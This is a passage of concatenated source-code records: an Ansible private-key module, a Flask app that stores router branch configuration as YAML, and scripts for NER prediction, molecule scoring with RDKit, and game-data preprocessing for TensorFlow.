module_backend.set_existing(load_file_if_exists(self.path, module))\n\n def generate(self, module):\n \"\"\"Generate a keypair.\"\"\"\n\n if self.module_backend.needs_regeneration():\n # Regenerate\n if not self.check_mode:\n if self.backup:\n self.backup_file = module.backup_local(self.path)\n self.module_backend.generate_private_key()\n privatekey_data = self.module_backend.get_private_key_data()\n if self.return_content:\n self.privatekey_bytes = privatekey_data\n write_file(module, privatekey_data, 0o600)\n self.changed = True\n elif self.module_backend.needs_conversion():\n # Convert\n if not self.check_mode:\n if self.backup:\n self.backup_file = module.backup_local(self.path)\n self.module_backend.convert_private_key()\n privatekey_data = self.module_backend.get_private_key_data()\n if self.return_content:\n self.privatekey_bytes = privatekey_data\n write_file(module, privatekey_data, 0o600)\n self.changed = True\n\n file_args = module.load_file_common_arguments(module.params)\n self.changed = module.set_fs_attributes_if_different(file_args, self.changed)\n\n def remove(self, module):\n 
self.module_backend.set_existing(None)\n if self.backup and not self.check_mode:\n self.backup_file = module.backup_local(self.path)\n super(PrivateKeyModule, self).remove(module)\n\n def dump(self):\n \"\"\"Serialize the object into a dictionary.\"\"\"\n\n result = self.module_backend.dump(include_key=self.return_content)\n result['filename'] = self.path\n result['changed'] = self.changed\n if self.backup_file:\n result['backup_file'] = self.backup_file\n\n return result\n\n\ndef main():\n\n argument_spec = get_privatekey_argument_spec()\n argument_spec.argument_spec.update(dict(\n state=dict(type='str', default='present', choices=['present', 'absent']),\n force=dict(type='bool', default=False),\n path=dict(type='path', required=True),\n backup=dict(type='bool', default=False),\n return_content=dict(type='bool', default=False),\n ))\n module = argument_spec.create_ansible_module(\n supports_check_mode=True,\n add_file_common_args=True,\n )\n\n base_dir = os.path.dirname(module.params['path']) or '.'\n if not os.path.isdir(base_dir):\n module.fail_json(\n name=base_dir,\n msg='The directory %s does not exist or the file is not a directory' % base_dir\n )\n\n backend, module_backend = select_backend(\n module=module,\n backend=module.params['select_crypto_backend'],\n )\n\n try:\n private_key = PrivateKeyModule(module, module_backend)\n\n if private_key.state == 'present':\n private_key.generate(module)\n else:\n private_key.remove(module)\n\n result = private_key.dump()\n module.exit_json(**result)\n except OpenSSLObjectError as exc:\n module.fail_json(msg=to_native(exc))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/crypto/plugins/modules/openssl_privatekey.py","file_name":"openssl_privatekey.py","file_ext":"py","file_size_in_byte":9865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"229173320","text":"\"\"\"\nSchema's common stuff\n\"\"\"\nimport sys\n\nif sys.version_info < (3, 6):\n from aiohttp_json_api.compat.enum import Enum, Flag, auto\nelse:\n from enum import Enum, Flag, auto\n\n\nclass Step(Enum):\n BEFORE_DESERIALIZATION = auto()\n AFTER_DESERIALIZATION = auto()\n BEFORE_SERIALIZATION = auto()\n AFTER_SERIALIZATION = auto()\n\n\nclass Event(Flag):\n GET = auto()\n POST = auto()\n PATCH = auto()\n DELETE = auto()\n NEVER = auto()\n ALWAYS = GET | POST | PATCH | DELETE\n CREATE = POST\n UPDATE = PATCH\n","sub_path":"aiohttp_json_api/schema/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"325463015","text":"# -*- coding:utf-8 -*-\n\nfrom app import db\nfrom app.models.message import Message, MessageMiddle\nimport datetime\n\n\ndef message(content, cat, nicks):\n m = Message(content=content, cat=cat, time=datetime.datetime.now())\n m.save()\n\n for nick in nicks.split(',')[:-1]:\n if nick:\n data = dict(message_id=m.id, nick=nick, cat=cat,)\n db.session.add(MessageMiddle(**data))\n db.session.commit()\n","sub_path":"app/tools/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"309255276","text":"import argparse, os\nfrom deeppavlov import build_model, configs\nfrom converters import tokenize, tokenize_tagged, NO_ENTITY_MARK\nfrom nltk.tokenize import RegexpTokenizer\nfrom 
file_operations import write_lines\n\nTAGGED_MARK = 'tagged'\n\nPREDICTED_TAG_BODIES_MAPPING = {'LOC': 'Location', 'ORG': 'Org', 'PER': 'Person', 'O': 'O', 'PERSON': 'Person', \n 'GPE': 'Org', 'NORP': 'Location', 'WORK_OF_ART': 'Org'}\nDEFAULT_TAG_BODY = 'Other'\n\nMODEL_IDS = {\n 'slavic': 'slavic',\n 'ontonotes_bert': 'ner_ontonotes_bert',\n 'ontonotes_mult': 'ner_ontonotes_bert_mult',\n 'rus_bert': 'ner_rus_bert',\n 'rus': 'ner_rus',\n 'few_shot_simulate': 'ner_few_shot_ru_simulate',\n 'ontonotes': 'ner_ontonotes',\n 'few_shot': 'ner_few_shot_ru',\n 'kb_rus': 'ner_kb_rus'\n}\n\nMODEL_CONFIGS = {\n 'slavic': './ner_bert_slav.json',\n 'ontonotes_bert': configs.ner.ner_ontonotes_bert,\n 'ontonotes_mult': configs.ner.ner_ontonotes_bert_mult,\n 'rus_bert': configs.ner.ner_rus_bert,\n 'rus': configs.ner.ner_rus,\n 'few_shot_simulate': configs.ner.ner_few_shot_ru_simulate,\n 'ontonotes': configs.ner.ner_ontonotes,\n 'few_shot': configs.ner.ner_few_shot_ru,\n 'kb_rus': configs.ner.ner_kb_rus\n}\n\ndef get_key(dictionary, required_value):\n for key, value in dictionary.items(): # for name, age in dictionary.iteritems(): (for Python 2.x)\n if value == required_value:\n return key\n\ndef write_prediction_results(labels, tokens, output_file):\n lines = []\n for sentence_tokens, sentence_labels in zip(tokens, labels):\n for token, label in zip(sentence_tokens, sentence_labels):\n if len(label.split(\"-\")) < 2:\n lines.append(f'{token} {NO_ENTITY_MARK}')\n else:\n tag_prefix, tag_body = label.split(\"-\")\n tag_body = PREDICTED_TAG_BODIES_MAPPING.get(tag_body, DEFAULT_TAG_BODY)\n lines.append(f'{token} {tag_prefix}-{tag_body}')\n #lines.append(f'{token} {label}')\n #lines.append(f'{token} {label.split(\"-\")[-1].capitalize()}')\n lines.append('')\n write_lines(output_file, lines)\n\ndef extract_predictions(sentence):\n return list(map(lambda one_item_list: one_item_list[0], sentence[1]))\n\ndef _predict(config_id, tokens, output_file):\n # Download and load model (set download=False to skip download phase)\n print(f'Config: {MODEL_CONFIGS[config_id]}')\n ner = build_model(MODEL_CONFIGS[config_id], download = True)\n\n # if args.model == MODEL_IDS['slavic']:\n # ner = build_model(\"./ner_bert_slav.json\", download=True)\n # elif args.model == MODEL_IDS['rus']:\n # ner = build_model(configs.ner.ner_rus_bert, download=True)\n\n entities = list(map(lambda sentence: extract_predictions(ner(sentence)), tokens))\n\n write_prediction_results(entities, tokens, output_file)\n\nif __name__ == \"__main__\":\n tokenizer = RegexpTokenizer('\\w+|\\$[\\d\\.]+|\\S+')\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--input_file', type=str, default='raw.txt')\n parser.add_argument('--output_file', type=str, default='raw.predictions.txt')\n parser.add_argument('--model', type=str, default=MODEL_IDS['slavic'], choices=list(MODEL_IDS.values()))\n parser.add_argument('--run_all', type=bool, default=False)\n parser.add_argument('--tagged', action='store_true')\n\n args = parser.parse_args()\n\n tokens = tokenize(args.input_file, tokenizer) if not args.tagged and not TAGGED_MARK in args.input_file.split('/')[-1].split('.') else tokenize_tagged(args.input_file)\n\n if not args.run_all:\n # # Download and load model (set download=False to skip download phase)\n # ner = build_model(MODEL_CONFIGS[get_key(MODEL_IDS, args.model)])\n # # if args.model == MODEL_IDS['slavic']:\n # # ner = build_model(\"./ner_bert_slav.json\", download=True)\n # # elif args.model == MODEL_IDS['rus']:\n # # ner = 
build_model(configs.ner.ner_rus_bert, download=True)\n\n # entities = list(map(lambda sentence: extract_predictions(ner(sentence)), tokens))\n\n # write_prediction_results(entities, tokens, args.output_file)\n _predict(get_key(MODEL_IDS, args.model), tokens, args.output_file)\n else:\n for config in MODEL_CONFIGS:\n #print(config)\n _predict(config, tokens, f'eval.tagged.{config}.txt')\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"613592376","text":"from flask import Flask, request, json, Response, render_template, flash, redirect, jsonify, url_for\nfrom pymongo import errors, MongoClient\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField\nfrom wtforms.validators import DataRequired, ValidationError\n\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nfrom flask_table import Table, Col, LinkCol\n\nimport logging\nimport file_handler\nimport yaml, pathlib\nfrom IPy import IP\n\nLOG = logging.getLogger(__name__)\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'ezpz'\n\nENV_FILE = pathlib.Path(\"/usr/share/flask/file_web_db.yml\")\n\nwith open(ENV_FILE, \"r\") as yaml_data:\n ENV_DATA = yaml.load(yaml_data, Loader=yaml.FullLoader)\n HOST_IP = str(ENV_DATA['HOST_IP'])\n\nnav = [\n {'name': 'Home', 'url': f'http://{HOST_IP}:5000/home'},\n {'name': 'Upload/Delete', 'url': f'http://{HOST_IP}:5000/upload'},\n {'name': 'Search', 'url': f'http://{HOST_IP}:5000/search'},\n]\n\nclass Results(Table):\n id = Col('BranchId', show=False)\n edit = LinkCol(\n name='Edit',\n endpoint='update',\n url_kwargs=dict(id='routerName'),\n )\n Delete = LinkCol(\n name='Delete',\n endpoint='delete',\n url_kwargs=dict(id='routerName'),\n )\n routerName = Col('routerName')\n customer_pciAddress = Col('customer_pciAddress')\n customer_tenant = Col('customer_tenant')\n dns_servers = Col('dns_servers')\n entitlement_end_date = Col('entitlement_end_date')\n entitlement_mbs = Col('entitlement_mbs')\n interNodeSecurity = Col('interNodeSecurity')\n interRouterSecurity = Col('interRouterSecurity')\n location = Col('location')\n locationCoordinates = Col('locationCoordinates')\n management_loopback = Col('management_loopback')\n management_service_security = Col('management_service_security')\n management_tenant = Col('management_tenant')\n neighborhood_name = Col('neighborhood_name')\n ntp_servers = Col('ntp_servers')\n provider_gateway = Col('provider_gateway')\n provider_ipAddress = Col('provider_ipAddress')\n provider_pciAddress = Col('provider_pciAddress')\n provider_prefixLength = Col('provider_prefixLength')\n provider_tenant = Col('provider_tenant')\n\n\nclass SearchForm(FlaskForm):\n search = StringField('Branch ID')\n submit = SubmitField('search')\n\n\nclass DataForm(FlaskForm):\n \"\"\"\n From for DB entry\n \"\"\"\n # storeNumber = StringField('storeNumber', validators=[DataRequired()])\n # storeId = StringField('storeId', validators=[DataRequired()])\n # name = StringField('name', validators=[DataRequired()])\n # location = StringField('location', validators=[DataRequired()])\n # data = { \"storeNumber\": storeNumber, \"name\": name, \"storeId\": storeId, \"location\": location }\n # submit = SubmitField('Upload Data')\n\n\n routerName = StringField('routerName', validators=[DataRequired()])\n customer_pciAddress = StringField('customer_pciAddress', validators=[DataRequired()])\n customer_tenant = 
StringField('customer_tenant', validators=[DataRequired()])\n dns_servers = StringField('dns_servers', validators=[DataRequired()])\n entitlement_end_date = StringField('entitlement_end_date', validators=[DataRequired()])\n entitlement_mbs = StringField('entitlement_mbs', validators=[DataRequired()])\n interNodeSecurity = StringField('interNodeSecurity', validators=[DataRequired()])\n interRouterSecurity = StringField('interRouterSecurity', validators=[DataRequired()])\n location = StringField('location', validators=[DataRequired()])\n locationCoordinates = StringField('locationCoordinates', validators=[DataRequired()])\n management_loopback = StringField('management_loopback', validators=[DataRequired()])\n management_service_security = StringField('management_service_security', validators=[DataRequired()])\n management_tenant = StringField('management_tenant', validators=[DataRequired()])\n neighborhood_name = StringField('neighborhood_name', validators=[DataRequired()])\n ntp_servers = StringField('ntp_servers', validators=[DataRequired()])\n provider_gateway = StringField('provider_gateway', validators=[DataRequired()])\n provider_ipAddress = StringField('provider_ipAddress', validators=[DataRequired()])\n provider_pciAddress = StringField('provider_pciAddress', validators=[DataRequired()])\n provider_prefixLength = StringField('provider_prefixLength', validators=[DataRequired()])\n provider_tenant = StringField('provider_tenant', validators=[DataRequired()])\n data = { \"routerName\": routerName, \"customer_pciAddress\": customer_pciAddress, \"customer_tenant\": customer_tenant,\n \"dns_servers\": dns_servers, \"entitlement_end_date\": entitlement_end_date, \"entitlement_mbs\": entitlement_mbs,\n \"interNodeSecurity\": interNodeSecurity, \"interRouterSecurity\": interRouterSecurity, \"location\": location,\n \"locationCoordinates\": locationCoordinates, \"management_loopback\": management_loopback,\n \"management_service_security\": management_service_security, \"management_tenant\": management_tenant,\n \"neighborhood_name\": neighborhood_name, \"ntp_servers\": ntp_servers, \"provider_gateway\": provider_gateway,\n \"provider_ipAddress\": provider_ipAddress, \"provider_pciAddress\": provider_pciAddress,\n \"provider_prefixLength\": provider_prefixLength, \"provider_tenant\": provider_tenant}\n submit = SubmitField('Upload Data')\n\n def validate_dns_servers(form, field):\n ip_list = field.data.split(',')\n for address in ip_list:\n try:\n IP(address)\n except:\n raise ValidationError(\"Invalid IP list\")\n\n def validate_ntp_servers(form, field):\n ip_list = field.data.split(',')\n for address in ip_list:\n try:\n IP(address)\n except:\n raise ValidationError(\"Invalid IP\")\n\n\n@app.route(\"/home\")\ndef home():\n \"\"\"Landing page.\"\"\"\n return render_template(\n 'home.html',\n nav=nav,\n title=\"Local Database UI\",\n description=\"Web interface for interacting with the Database.\"\n )\n\n@app.route(\"/search\", methods=['GET', 'POST'])\ndef search():\n form = SearchForm()\n if request.method == 'POST':\n return search_results(form)\n return render_template('search_new.html', nav=nav, form=form)\n\n@app.route('/results')\ndef search_results(search):\n results = []\n # print(f\"=============>Search data: {search.data}\")\n branch = search.data['search']\n print(f\"=============>Search data: {branch}, {type(branch)}\")\n if branch == '':\n results = file_handler.get_all()\n print(results)\n else:\n print(f\"=============>Search data: {results}, {type(results)}\")\n results = 
[file_handler.get_store_data(branch)['variables']]\n print(f\"=============>Search data: {results}, {type(results)}\")\n if not results:\n flash('No results found!')\n return redirect('/search')\n table = Results(results)\n table.border = True\n return render_template('results.html', nav=nav, table=table)\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n remove_list = [\"csrf_token\", \"submit\"]\n form = DataForm()\n if form.validate_on_submit():\n data = {}\n data['variables'] = request.form.to_dict()\n data['name'] = data['variables']['routerName']\n data['variables']['dns_servers'] = data['variables']['dns_servers'].strip()\n data['variables']['dns_servers'] = data['variables']['dns_servers'].split(\",\")\n data['variables']['ntp_servers'] = data['variables']['ntp_servers'].strip()\n data['variables']['ntp_servers'] = data['variables']['ntp_servers'].split(\",\")\n print(\"Form to JSON: {}\".format(data))\n try:\n [data['variables'].pop(key) for key in remove_list]\n except:\n print(f\"Error reading form {data}\")\n else:\n # flash('Attempting to upload data for storeNumber {} with data \\n {}'.format(\n # form.routerName.data, data))\n response = file_handler.write_json_to_yml(data)\n if response:\n return Response(response=json.dumps(data),\n status=200,\n mimetype='application/json')\n # return render_template('base.html', title='Upload Data')\n # redirect('/api/v1/stores/all')\n return render_template('form_new.html',\n nav=nav,\n # title='Upload Data',\n # description=\"Form to upload branch data.\",\n form=form,\n template=\"form-template\"\n )\n\n\n@app.route('/')\ndef base():\n return Response(response=json.dumps({\"Status\": \"UP\"}),\n status=200,\n mimetype='application/json')\n\n@app.route('/list', methods=['GET'])\ndef list_all():\n file_list = file_handler.list_files()\n print(file_list)\n # file_handler.convert_json_to_yaml(file_list['list'][0])\n return(file_list)\n\n\"\"\"\nhttp://localhost:5000/api/v1/stores?id=base\n\"\"\"\n@app.route('/api/v1/stores', methods=['GET'])\ndef query_by_storenumber():\n if 'id' in request.args:\n branch_file = str(request.args['id']) + '.yml'\n print(branch_file)\n file_list = list_all()\n print(file_list)\n if branch_file in file_list['list']:\n branch_data = file_handler.convert_yaml_to_json(branch_file)\n return(branch_data)\n return Response(response=branch_data,\n status=200,\n mimetype='application/json')\n return page_not_found(404)\n\n\n\"\"\"\ncurl --header \"Content-Type: application/json\" --request POST --data \\\n'{ \"variables\": {\"routerName\": \"01225\", \"storeId\": \"RIST05868P01\", \"location\": \"Burlington, MA\"}, \"name\": \"Instance_1\"}' \\\nhttp://localhost:5000/add\n\"\"\"\n@app.route('/api/v1/stores', methods=['POST'])\ndef insert_data():\n data = request.get_json()\n print(data)\n if data is None or data == {}:\n return Response(response=json.dumps({\"Error\": \"Invalid Input\"}),\n status=400,\n mimetype='application/json')\n if file_handler.write_json_to_yml(data):\n return Response(response=json.dumps({\"Success\": \"DB entry created\"}),\n status=200,\n mimetype='application/json')\n else:\n return Response(response=json.dumps({\"Error\": \"unable to write to file\"}),\n status=400,\n mimetype='application/json')\n\n\n@app.route('/update/<id>', methods=['GET', 'POST'])\ndef update(id):\n branch_data = file_handler.get_store_data(id)['variables']\n if branch_data is None or branch_data == {}:\n return Response(response=json.dumps({\"Error\": \"Invalid Input\"}),\n status=400,\n 
mimetype='application/json')\n if branch_data:\n print(f\"====================>{id}, {request}, {branch_data}\")\n branch_data['dns_servers'] = \",\".join(branch_data['dns_servers'])\n branch_data['ntp_servers'] = \",\".join(branch_data['ntp_servers'])\n form = DataForm(data=branch_data)\n if request.method == 'POST' and form.validate_on_submit():\n file_handler.update_file(branch_data)\n return render_template('form_new.html',\n nav=nav,\n form=form,\n template=\"form-template\"\n )\n else:\n return Response(response=json.dumps({\"Error\": \"unable to update data\"}),\n status=400,\n mimetype='application/json')\n\n\n\"\"\"\ncurl -H \"Accept: application/json\" --request DELETE http://localhost:5000/delete\\?id=01225\ncurl -X \"DELETE\" http://localhost:5000/delete?id=01225\n\"\"\"\n@app.route('/api/v1/stores', methods=['DELETE'])\ndef delete_data():\n if 'id' in request.args:\n id = str(request.args['id'])\n file_handler.delete_file(id)\n return Response(response=json.dumps({\"Success\": \"DB entry removed\"}),\n status=200,\n mimetype='application/json')\n return page_not_found(404)\n\n@app.route('/delete/<id>', methods=['GET', 'POST'])\ndef delete(id):\n try:\n file_handler.delete_file(id)\n return Response(response=json.dumps({\"Success\": \"DB entry removed\"}),\n status=200,\n mimetype='application/json')\n except:\n return page_not_found(404)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"The resource could not be found.\", 404\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000, host='0.0.0.0')\n","sub_path":"provisioner/file-web-db/routes/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"464950810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 14:30:23 2020\n\n@author: jacqu\n\nCompute statistics on 100k samples from cbas model \n\"\"\"\n\nimport os\nimport sys\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nif __name__ == \"__main__\":\n sys.path.append(os.path.join(script_dir, '..'))\n\nfrom rdkit import Chem\nfrom rdkit.Chem import Draw\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\nimport argparse\n\nfrom rdkit import Chem\nfrom rdkit.Chem import QED\nfrom rdkit.Chem import Draw\nfrom rdkit import DataStructs\nfrom rdkit.Chem import AllChem\nfrom scipy.spatial.distance import jaccard\n\nfrom sklearn.metrics import pairwise_distances\n\nfrom cairosvg import svg2pdf\n\n\n\nfrom eval.eval_utils import plot_csvs\nfrom utils import soft_mkdir\nfrom data_processing.comp_metrics import cycle_score, logP, qed\nfrom data_processing.sascorer import calculateScore\nfrom multiprocessing import Pool\n\nif __name__ == \"__main__\":\n \n optimol = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/big_new_lr/optimol_scored.csv'))\n try:\n multiobj = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/multiobj_big/multiobj_scored.csv'))\n except:\n pass\n gianni = pd.read_csv(os.path.join(script_dir,'..', 'data/fabritiis_docked.csv'))\n zinc = pd.read_csv(os.path.join(script_dir,'..', 'data/zinc_docked.csv'))\n \n threshold = 0.01\n \n def qeds(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 1 % statistics \n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n q = np.array([QED.default(m) for m in mols])\n \n 
return (np.mean(q), np.std(q))\n \n def sas(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n]\n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n q = np.array([calculateScore(m) for m in mols])\n \n return (np.mean(q), np.std(q))\n \n def docking(df): \n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 1 % statistics \n scores = df.score\n return (np.mean(scores), np.std(scores))\n \n def tanim_dist(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 1 % statistics \n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n fps = [AllChem.GetMorganFingerprintAsBitVect(m , 3, nBits=2048) for m in mols]\n fps= np.array(fps)\n D= pairwise_distances(fps, metric = 'jaccard')\n \n return (np.mean(D), np.std(D))\n \n # ZINC : \n \"\"\"\n print('*********** ZINC ********')\n \n qed_zinc = qeds(zinc)\n print(qed_zinc)\n sa_zinc = sas(zinc)\n print(sa_zinc)\n docking_zinc = docking(zinc)\n print(docking_zinc)\n \n div_zinc = tanim_dist(zinc)\n print(div_zinc)\n \n # Gianni \n print('*********** Gianni ********')\n qed_gianni = qeds(gianni)\n print(qed_gianni)\n sa_gianni = sas(gianni)\n print(sa_gianni)\n docking_gianni = docking(gianni)\n print(docking_gianni)\n div_gianni= tanim_dist(gianni)\n print(div_gianni)\n \n # Optimol \n print('*********** Optimol ********')\n qed_o = qeds(optimol)\n print(qed_o)\n sa_o = sas(optimol)\n print(sa_o)\n docking_o = docking(optimol)\n print(docking_o)\n div_o = tanim_dist(optimol)\n print(div_o)\n \n # Multiobj : TODO \n print('*********** Multiobj: todo ********')\n qed_m = qeds(multiobj)\n print(qed_m)\n sa_m = sas(multiobj)\n print(sa_m)\n docking_m = docking(multiobj)\n print(docking_m)\n div_m = tanim_dist(multiobj)\n print(div_m)\n \n \n ### Searching for actives : \n \n actives = pd.read_csv(os.path.join(script_dir,'..','data','excape_drd3.csv'))\n actives = actives[actives['active']=='A']\n actives=actives.smile\n a_mols = [Chem.MolFromSmiles(s) for s in actives]\n a_smiles = [Chem.MolToSmiles(m) for m in a_mols if m is not None]\n a_smiles = set(a_smiles)\n \n cpt = 0\n found = []\n for s in smiles : \n s= Chem.MolToSmiles(Chem.MolFromSmiles(s)) # canonical\n if s in a_smiles : \n cpt +=1\n found.append(s)\n print(cpt, ' actives found in samples: ')\n print(found)\n \"\"\"\n \n N = 24\n seed = 4264\n \n # Plot : 10000 first : \n optimol = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/big_new_lr/optimol_scored.csv'))\n optimol = optimol[:10000]\n optimol = optimol.sample(N, random_state = seed)\n \n \n # Top molecules \n samples = optimol.sort_values('score')\n smiles, scores = samples.smile, samples.score\n \n smiles = smiles[:N]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n qeds = np.array([QED.default(m) for m in mols])\n sas = [calculateScore(m) for m in mols]\n scores = scores[:N]\n \n smi_for_csv = smiles\n scores_for_csv= scores\n \n df = pd.DataFrame.from_dict({'smiles':smi_for_csv, 'score': scores_for_csv})\n df.to_csv('plots/optimol_samples_smiles.csv')\n \n img = Draw.MolsToGridImage(mols, molsPerRow= 3, useSVG=True, legends = [f'{sc:.2f}, QED = {q:.2f}, SA = {s:.2f}' for sc,q,s in zip(scores,qeds, sas)])\n svg2pdf(str(img),write_to='plots/optimol_samp.pdf')\n\n # Top molecules multiobj\n multiobj = pd.read_csv(os.path.join(script_dir,'..', 
'cbas/slurm/results/multiobj_big/multiobj_scored.csv'))\n multiobj = multiobj[:5000]\n multiobj = multiobj.sample(N, random_state = seed)\n \n samples = multiobj.sort_values('score')\n smiles, scores = samples.smile, samples.score\n \n smiles = smiles[:N]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n qeds = np.array([QED.default(m) for m in mols])\n print(qeds[:3])\n sas = [calculateScore(m) for m in mols]\n scores = scores[:N]\n \n img = Draw.MolsToGridImage(mols, molsPerRow= 3, useSVG=True, legends = [f'{sc:.2f}, QED = {q:.2f}, SA = {s:.2f}' for sc,q,s in zip(scores,qeds,sas)])\n svg2pdf(str(img),write_to='plots/multiobj_samp.pdf')\n \n smi_for_csv = smiles\n scores_for_csv = scores\n \n df = pd.DataFrame.from_dict({'smiles':smi_for_csv, 'score': scores_for_csv})\n df.to_csv('plots/multiobjective_samples_smiles.csv')\n","sub_path":"eval/analyze_samples.py","file_name":"analyze_samples.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"398701457","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom pickle import Pickler, Unpickler\n\nprint(tf.__version__)\n\nEPOCHS = 200\nNUM_CHANNELS=128\nKERNEL_SIZE=(4,4)\nDROPOUT_RATE=0\nBATCHNORM=True\nBATCH_SIZE=128\nSPLIT=0.2\nCACHE=True\nREMOVE_DUPLICATES=False\nAVERAGE_DUPLICATES=True\n#DATAFILE=\"/home/doma945/amoba_teleport/temp_1000sim_medium\"\nDATAFILE=\"/home/doma945/amoba_teleport/temp_1000sim_big\"\n#DATAFILE=\"/home/doma945/amoba_teleport/temp_4000sim\"\nCACHEFILE = \"/home/zombori/tmp/amoba_cache.npz\"\n#CACHEFILE = \"/home/doma945/tmp/amoba_cache.npz\"\nNETWORK=\"linear\"\n\ndef load_history():\n # ===== load history file =====\n # Descriptions: containes the data collected in every Iteration\n modelFile = os.path.join(DATAFILE, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n trainhistory = []\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. 
Read it.\")\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n\n print(\"The trainhistory containes {} iteration of data\".format(len(trainhistory)))\n\n # ===== Extract data =====\n trainExamples = []\n for i,e in enumerate(trainhistory):\n trainExamples.extend(np.array(e))\n\n print(\"Number of all trainexamples: {}\".format(len(trainExamples)))\n return trainExamples\n\ndef remove_duplicates(xs, ps, vs):\n dict = {}\n for i in range(xs.shape[0]):\n s = str(xs[i])\n dict[s] = i\n\n indices = list(dict.values())\n xs2 = xs[indices]\n ps2 = ps[indices]\n vs2 = vs[indices]\n\n print(\"Reduced shapes {}, {}, {} to {}, {}, {}\".format(xs.shape, ps.shape, vs.shape, xs2.shape, ps2.shape, vs2.shape))\n return xs2, ps2, vs2\n\ndef average_duplicates(xs, ps, vs):\n dict = {}\n for i in range(xs.shape[0]):\n s = str(xs[i])\n if s in dict:\n dict[s][\"ps\"].append(ps[i])\n dict[s][\"vs\"].append(vs[i])\n else:\n dict[s] = {\"x\": xs[i], \"ps\": [ps[i]], \"vs\": [vs[i]]}\n xs2 = []\n ps2 = []\n vs2 = []\n for s in dict:\n xs2.append(dict[s][\"x\"])\n ps2.append(np.mean(dict[s][\"ps\"], axis=0))\n vs2.append(np.mean(dict[s][\"vs\"]))\n xs2 = np.array(xs2)\n ps2 = np.array(ps2)\n vs2 = np.array(vs2)\n\n print(\"Average: reduced shapes {}, {}, {} to {}, {}, {}\".format(xs.shape, ps.shape, vs.shape, xs2.shape, ps2.shape, vs2.shape))\n return xs2, ps2, vs2\n \n\ndef preprocess_data(cache=True):\n if cache and os.path.isfile(CACHEFILE):\n npz = np.load(CACHEFILE)\n xs = npz['xs']\n ps = npz['ps']\n vs = npz['vs']\n else: \n trainExamples = load_history()\n xs = []\n ps = []\n vs = []\n curPlayers = []\n for (allBoard, curPlayer, pi, action) in trainExamples:\n xs.append(allBoard)\n curPlayers.append(curPlayer)\n ps.append(pi)\n vs.append(action)\n xs = np.array(xs)\n curPlayers = np.array(curPlayers)\n ps = np.array(ps)\n vs = np.array(vs)\n\n board = np.expand_dims(xs[:,:,:,0], axis = 3)\n heur_channels = xs[:,:,:,1:]\n white_board = board * (board+1) -1\n black_board = board * (board-1) -1\n\n curPlayers = curPlayers.reshape((-1, 1, 1, 1))\n player_channel = curPlayers * np.ones_like(board) \n xs = np.concatenate([white_board, black_board, heur_channels, player_channel], axis=3)\n\n if AVERAGE_DUPLICATES:\n xs, ps, vs = average_duplicates(xs, ps, vs)\n elif REMOVE_DUPLICATES:\n xs, ps, vs = remove_duplicates(xs, ps, vs)\n np.savez(CACHEFILE, xs=xs, ps=ps, vs=vs)\n\n print(\"Input shape: \", xs.shape)\n print(\"Target policy shape: \", ps.shape)\n print(\"Target value shape: \", vs.shape)\n return (xs, ps, vs)\n\n\n(xs, ps, vs) = preprocess_data(cache=CACHE)\n\ndef show(i):\n x = xs[i]\n p = ps[i]\n white = (x[:,:,0]+1) / 2\n black = (x[:,:,1]+1) / 2\n player = x[0,0,10]\n board = white - black\n policy = p.reshape((12,4))\n value = vs[i]\n print(np.transpose(board))\n print(np.transpose(policy))\n print(\"value: \", value)\n print(\"player: \", player)\n\n\n# players = np.mean(xs[:,:,:,10], axis=(1,2))\n# print(len(players))\n# print(np.sum(players))\n\n\ninput_shape = 